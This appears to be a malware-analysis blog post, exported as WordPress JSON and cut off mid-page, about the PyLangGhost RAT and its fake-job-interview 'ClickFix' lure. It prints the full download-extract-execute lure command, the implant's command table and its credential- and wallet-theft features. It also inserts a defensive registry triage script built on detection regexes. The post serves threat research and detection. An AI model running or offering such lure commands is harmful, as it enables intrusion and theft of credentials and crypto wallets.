{"id":15287,"date":"2025-08-06T10:31:04","date_gmt":"2025-08-06T10:31:04","guid":{"rendered":"\/cybersecurity-blog\/?p=15287"},"modified":"2025-08-06T13:47:54","modified_gmt":"2025-08-06T13:47:54","slug":"pylangghost-malware-analysis","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/","title":{"rendered":"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0"},"content":{"rendered":"\n<p><em>Editor\u2019s note:<\/em><strong><em>&nbsp;The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can&nbsp;<\/em><\/strong><a href=\"https:\/\/x.com\/MauroEldritch\" target=\"_blank\" rel=\"noreferrer noopener\"><strong><em>find Mauro on X<\/em><\/strong><\/a><strong><em>.<\/em><\/strong>&nbsp;<\/p>\n\n\n\n<p>North Korean state-sponsored groups, such as Lazarus, continue to target the financial and cryptocurrency sectors with a variety of custom malware families. In previous research, we examined strains like <a href=\"https:\/\/any.run\/cybersecurity-blog\/invisibleferret-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">InvisibleFerret, Beavertail<\/a>, and <a href=\"https:\/\/any.run\/cybersecurity-blog\/ottercookie-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">OtterCookie<\/a>, often deployed through fake developer job interviews or staged business calls with executives. While these have been the usual suspects, a newer Lazarus subgroup,&nbsp;<strong>Famous Chollima<\/strong>, has recently introduced a fresh threat:&nbsp;<strong>PyLangGhost RAT<\/strong>, a Python-based evolution of GoLangGhostRAT.&nbsp;<\/p>\n\n\n\n<p>Unlike common malware that spreads through pirated software or infected USB drives, PyLangGhost RAT is delivered via highly targeted social engineering campaigns aimed at the technology, finance, and crypto industries, with developers and executives as prime victims. 
In these attacks, adversaries stage fake job interviews and trick their targets into believing that their browser is blocking access to the camera or microphone. The \u201csolution\u201d they offer is to run a script that supposedly grants permission. In reality, the script hands over full remote access to a North Korean operator.&nbsp;<\/p>\n\n\n\n<p>This sample was obtained from fellow researcher Heiner Garc\u00eda P\u00e9rez of BlockOSINT, who encountered it during a fake job recruitment attempt and documented his findings in an advisory. &nbsp;<\/p>\n\n\n\n<p>Let\u2019s break it down.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"880\" height=\"393\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1.png\" alt=\"\" class=\"wp-image-15293\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1.png 880w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-300x134.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-768x343.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-370x165.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-270x121.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-740x330.png 740w\" sizes=\"(max-width: 880px) 100vw, 880px\" \/><figcaption class=\"wp-element-caption\"><em>A fake interview process. 
Source: BlockOSINT<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Key Takeaways&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Attribution:<\/strong> PyLangGhost RAT is linked to the North Korean Lazarus subgroup&nbsp;<em>Famous Chollima<\/em>, known for using highly targeted and creative intrusion methods.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Delivery Method: <\/strong>Distributed through \u201cClickFix\u201d social engineering, where victims are tricked into running malicious commands to supposedly fix a fake camera or microphone error during staged job interviews.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Core Components: <\/strong>The malware\u2019s main loader (nvidia.py) relies on multiple modules (config.py,&nbsp;api.py,&nbsp;command.py,&nbsp;util.py,&nbsp;auto.py) for persistence, C2 communication, command execution, data compression, and credential theft.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Credential &amp; Wallet Theft: <\/strong>Targets browser-stored credentials and cryptocurrency wallet data from extensions like MetaMask, BitKeep, Coinbase Wallet, and Phantom, using privilege escalation and decryption of the Chrome encryption key (including handling for Chrome\u2019s newer App-Bound Encryption, recognisable by its \u201cv20\u201d value prefix).&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>C2 Communication: <\/strong>Talks to raw IP addresses over plain HTTP with no TLS, encrypting payloads with RC4 and guarding them with an MD5 checksum, a combination that offers neither real confidentiality nor integrity; it nevertheless stays stealthy, with very low initial detection rates (0\u20133 detections on VirusTotal).&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Detection &amp; Analysis:<\/strong> <a href=\"https:\/\/app.any.run\/tasks\/275e3573-0b3e-4e77-afaf-fe99b935c510\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">Identified as 100\/100 malicious by 
ANY.RUN<\/a>, with telltale signs including the default&nbsp;python-requests&nbsp;User-Agent and multiple rapid requests to C2 infrastructure.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Code Origin: <\/strong>Appears to be a full Python reimplementation of GoLangGhost RAT, likely aided by AI, as indicated by Go-like logic patterns, unusual code structure, and large commented-out sections.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">The Fake Job Offer Trap&nbsp;<\/h2>\n\n\n\n<p>In the past, DPRK operators have resorted to creative methods to distribute malware, from staging fake job interviews and sharing bogus coding challenges (some laced with malware, others seemingly clean but invoking malicious dependencies at runtime), to posing as VCs in business calls, pretending not to hear the victim, and prompting them to download a fake Zoom fix or update.&nbsp;<\/p>\n\n\n\n<p>This case is a bit different. It falls into a newer category of attacks called&nbsp;<strong>\u201cClickFix\u201d<\/strong>&nbsp;\u2014 scenarios where the attacker, or one of their websites, presents the victim with fake CAPTCHAs or error messages that prevent them from completing an interview or coding challenge. 
The proposed fix is deceptively simple: copy a command shown on the website and paste it into a terminal or the Windows Run window (Win + R) to \u201csolve the issue.\u201d By doing so, users end up executing malicious scripts with their own privileges, or even worse, as Administrator, essentially handing control of the system to a Chollima operator.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"844\" height=\"444\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2.png\" alt=\"\" class=\"wp-image-15294\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2.png 844w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-300x158.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-768x404.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-370x195.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-270x142.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-740x389.png 740w\" sizes=\"(max-width: 844px) 100vw, 844px\" \/><figcaption class=\"wp-element-caption\"><em>A fake &#8220;Race Condition&#8221; Error, prompting the user to run a command. Source: BlockOSINT<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In this case, the researcher received a fake job offer to work at the Aave DeFi Protocol. After a brief screening with a few generic questions, he was redirected to a page that began flooding him with notifications about an error dubbed&nbsp;<strong>\u201cRace Condition in Windows Camera Discovery Cache.\u201d<\/strong>&nbsp;<\/p>\n\n\n\n<p>Luckily, the website offered a quick fix for this \u201cproblem\u201d: just run a small code snippet in the terminal.&nbsp;<\/p>\n\n\n\n<p>But what does this code actually do? 
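<\/p>\n\n\n\n<p>Before reading the command itself, it is worth having a way to answer a simpler question on a machine that may already have been hit: did anyone paste such a \u201cfix\u201d into the Run dialog? Windows records the last commands typed into Win + R under the per-user key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, one value per entry, each ending in a literal \u201c\\1\u201d, with an MRUList value giving their order. The script below is an added example written for this article, not code from the campaign, from BlockOSINT or from ANY.RUN. It parses those entries (or any list of one-liners you pass it) and scores each against the download, extract and execute chain used by this lure. The indicator regexes, their weights and the threshold are assumptions chosen for illustration; the RunMRU content is constructed, with the lure command from this case included in defanged form.<\/p>\n\n

```python
"""ClickFix triage helper: score Run-dialog (Win + R) history against the
download -> extract -> execute chain used by the PyLangGhost lure.

Added example for this article; not code from the campaign, BlockOSINT or ANY.RUN.
The indicator list, weights and threshold are illustrative assumptions.
"""
import re
import sys

RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# (label, pattern, weight). Weights are an assumption, chosen so that the full
# chain scores well above a lone "curl" or "wscript".
INDICATORS = [
    ("downloader",      r"\b(curl|certutil|bitsadmin|Invoke-WebRequest|iwr|wget)\b", 2),
    ("cert_check_off",  r"\bcurl\b[^&|]*\s-k\b|--insecure\b|-SkipCertificateCheck\b", 1),
    ("drop_to_temp",    r"%TEMP%|\$env:TEMP\b|\\AppData\\Local\\Temp\\", 1),
    ("archive_extract", r"\bExpand-Archive\b|\btar\s+-x|\bunzip\b", 1),
    ("script_host",     r"\b(wscript|cscript|mshta|rundll32|regsvr32)\b", 2),
    ("exe_runs_py",     r"\w+\.exe\s+\S+\.py\b", 2),   # e.g. "csshost.exe nvidia.py"
    ("chained",         r"&&|\|\||;\s*\w", 1),
]
COMPILED = [(label, re.compile(pat, re.IGNORECASE), w) for label, pat, w in INDICATORS]

# Constructed sample of a RunMRU key. Explorer stores each command as "<command>\1"
# in values named a, b, c, ... and keeps their order (most recent first) in MRUList.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": r"notepad\1",
    "b": r"\\fileserver\share\1",
    # The lure command from this case, domain defanged.
    "c": (r'''curl -k -o "%TEMP%\nvidiaRelease.zip" https://360scanner[.]store/cam-v-b74si.fix && '''
          r'''powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease.zip' '''
          r'''-DestinationPath '%TEMP%\nvidiaRelease'" && wscript "%TEMP%\nvidiaRelease\update.vbs"\1'''),
}


def parse_runmru(values):
    """Return the Run-dialog history, most recent first, with the "\\1" terminator stripped."""
    history = []
    for slot in values.get("MRUList", ""):
        data = values.get(slot)
        if isinstance(data, str):
            history.append(re.sub(r"\\1$", "", data))
    return history


def score_command(cmd):
    """Return (score, [matched labels]) for a single command line."""
    hits = [(label, w) for label, rx, w in COMPILED if rx.search(cmd)]
    return sum(w for _, w in hits), [label for label, _ in hits]


def triage(values, threshold=5):
    """Flag RunMRU entries whose score reaches the threshold (the threshold is an assumption)."""
    flagged = []
    for cmd in parse_runmru(values):
        score, labels = score_command(cmd)
        if score >= threshold:
            flagged.append({"command": cmd, "score": score, "labels": labels})
    return flagged


def read_runmru_from_registry():
    """Windows only: read the live RunMRU key of the current user."""
    import winreg  # standard library, but only importable on Windows
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_PATH) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values under this key
                break
            values[name] = data
            index += 1
    return values


if __name__ == "__main__":
    source = read_runmru_from_registry() if sys.platform == "win32" else SAMPLE_RUNMRU
    for hit in triage(source):
        print(f"[score {hit['score']}] {', '.join(hit['labels'])}\n    {hit['command']}")
```

<p>On a Windows host the script reads the live key; anywhere else it falls back to the constructed sample. Treat the score as a triage hint rather than a verdict: an administrator who legitimately downloads an archive into %TEMP% with curl will trip it too, and RunMRU only covers the Run dialog, so a command pasted into a cmd or PowerShell window has to be hunted in process-creation telemetry instead.<\/p>\n\n\n\n<p>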
Let\u2019s find out.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Chollimas &amp; Pythons&nbsp;<\/h2>\n\n\n\n<p>Let&#8217;s analyze the command (domain defanged):&nbsp;<\/p>\n\n\n\n<p><em>curl -k -o \"%TEMP%\\nvidiaRelease.zip\" https:\/\/360scanner[.]store\/cam-v-b74si.fix &amp;&amp; powershell -Command \"Expand-Archive -Force -Path '%TEMP%\\nvidiaRelease.zip' -DestinationPath '%TEMP%\\nvidiaRelease'\" &amp;&amp; wscript \"%TEMP%\\nvidiaRelease\\update.vbs\"<\/em>&nbsp;<\/p>\n\n\n\n<p>This one-liner:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Downloads a ZIP file from 360scanner[.]store using curl; the -k flag disables TLS certificate validation, so the lure works even with a self-signed or mismatched certificate.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Extracts it to the %TEMP%\\nvidiaRelease directory using PowerShell\u2019s Expand-Archive.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Executes a VBScript named update.vbs via wscript. The three steps are chained with &amp;&amp;, so nothing runs unless the download succeeded.&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"364\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-1024x364.png\" alt=\"\" class=\"wp-image-15296\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-1024x364.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-300x107.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-768x273.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-1536x545.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-370x131.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-270x96.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-740x263.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3.png 1656w\" sizes=\"(max-width: 
1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>update.vbs contents<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Now let\u2019s look at what this script actually does:<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Inside&nbsp;update.vbs&nbsp;<\/h3>\n\n\n\n<p>It silently decompresses Lib.zip into the same directory using tar (the bsdtar build that ships with Windows 10 and later, so no extra tooling is needed), waits for the extraction to finish, and keeps the console window hidden the whole time.&nbsp;<\/p>\n\n\n\n<p>Then it runs csshost.exe nvidia.py. The filename csshost.exe is mildly obfuscated by being split into two string fragments (&#8220;css&#8221; and &#8220;host.exe&#8221;) that are concatenated right before execution, a cheap way to dodge naive string matching on the script.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Disguised Python Environment&nbsp;<\/h3>\n\n\n\n<p>But what is csshost.exe?&nbsp;<\/p>\n\n\n\n<p>It\u2019s actually a renamed python.exe binary. Nothing more. No packing, no exotic tricks; just Python, rebranded. Renaming does not touch the file\u2019s version resource, so the quickest confirmation is to read its properties: OriginalFilename still says python.exe. For the same reason, if the binary is an official build, its Authenticode signature remains valid under the new name, so a \u201csigned by Python Software Foundation\u201d verdict on csshost.exe is expected and is not a reason to trust it.&nbsp;<\/p>\n\n\n\n<p>The Lib.zip file is a clean Python environment bundled with standard libraries, containing nothing malicious or unusual. From a detection standpoint the signal is therefore the process chain rather than any single file: wscript.exe spawning tar.exe (directly or via cmd.exe) and then an unfamiliar executable from %TEMP% with a .py argument.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-1024x587.png\" alt=\"\" class=\"wp-image-15297\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-1024x587.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-300x172.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-768x440.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-1536x880.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-2048x1173.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-370x212.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-270x155.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-740x424.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Lib.zip contents, clean<\/em><\/figcaption><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">A Decoy and Its Real Payload&nbsp;<\/h3>\n\n\n\n<p>Interestingly, if you download the same file manually with a different User-Agent, the server returns a legitimate driver instead: a simple but effective decoy that fingerprints the requesting client. Anyone fetching the payload for analysis should therefore replay the lure\u2019s request as-is (curl\u2019s default User-Agent included) rather than use a browser, or they will end up analysing the decoy.&nbsp;<\/p>\n\n\n\n<p>As for nvidia.py itself, it imports three additional modules: api.py, config.py, and command.py. The last one, in turn, also uses util.py and auto.py.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Core Modules and Their Roles&nbsp;<\/h3>\n\n\n\n<p>Let\u2019s break down these modules, starting with config.py.&nbsp;<\/p>\n\n\n\n<p>This file defines a set of constants used throughout the malware lifecycle, including message types, command codes, and operational parameters.&nbsp;<\/p>\n\n\n\n<p>Here\u2019s a quick reference of the command dictionary defined in config.py:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-245\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"11\"\n           data-wpID=\"245\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        
Code                    <\/th>\n                                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Function                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        qwer\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Get system information\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        asdf\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                
            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Upload a file\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        zxcv\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Download a file\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        vbcx\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"       
             padding:10px;\n                    \"\n                    >\n                                        Open a terminal session\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        qalp\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Detach terminal (background)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ghd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Wait\u00a0     
               <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        89io\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Gather Chrome extension data\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        gi%#\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Exfiltrate Chrome cookie store\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr 
class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        kyci\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Exfiltrate Chrome keychain\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        dghh\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Exit the implant\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-245'>\ntable#wpdtSimpleTable-245{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-245 
td, table.wpdtSimpleTable245 th { white-space: normal !important; }\n<\/style>\n\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"858\" height=\"882\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5.png\" alt=\"\" class=\"wp-image-15298\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5.png 858w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-292x300.png 292w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-768x789.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-370x380.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-270x278.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-740x761.png 740w\" sizes=\"(max-width: 858px) 100vw, 858px\" \/><figcaption class=\"wp-element-caption\"><em>Command dictionary in config.py<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Immediately after that, the C2 server address is declared. Geolocation data for it is inconsistent: most sources place it in the United Kingdom, while some label it &#8220;Private Client &#8211; Iran&#8221;, so the country should not be read as attribution evidence. The same block defines the registry key used for persistence and the list of Chrome extensions targeted for exfiltration,&nbsp;including MetaMask, BitKeep, Coinbase Wallet, and Phantom.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-960x1024.png\" alt=\"\" class=\"wp-image-15299\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-960x1024.png 960w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-281x300.png 281w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-768x819.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-370x395.png 370w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-270x288.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-740x789.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6.png 1262w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><figcaption class=\"wp-element-caption\"><em>Extensions list, C2 server and persistence key<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Coming up next, <strong>api.py<\/strong> manages communication with the C2 server we just saw in config.py. There are three main functions:&nbsp;<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Packet0623make, which encrypts the payload with RC4, builds the packet and computes an MD5 checksum over it. RC4 is obsolete and cryptographically broken, but it fits in a dozen lines with no third-party dependency, which probably explains the choice.&nbsp;<\/li>\n<\/ol>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li>Packet0623decode, which validates the checksum and decrypts the packet. An MD5 checksum only catches accidental corruption: it is not a keyed MAC, so anyone able to recompute it can alter a packet without being detected.&nbsp;<\/li>\n<\/ol>\n\n\n\n<ol start=\"3\" class=\"wp-block-list\">\n<li>Htxp0623Exchange, which simply POSTs the packet to the server over plain HTTP. With no TLS on the wire, the RC4 keystream is all that separates a passive observer from the C2 traffic, and since the key has to live in the plain-text Python implant, that protection is nominal: whoever has the sample can decrypt captured traffic.&nbsp;<\/li>\n<\/ol>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"860\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-1024x860.png\" alt=\"\" class=\"wp-image-15300\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-1024x860.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-300x252.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-768x645.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-370x311.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-270x227.png 270w, 
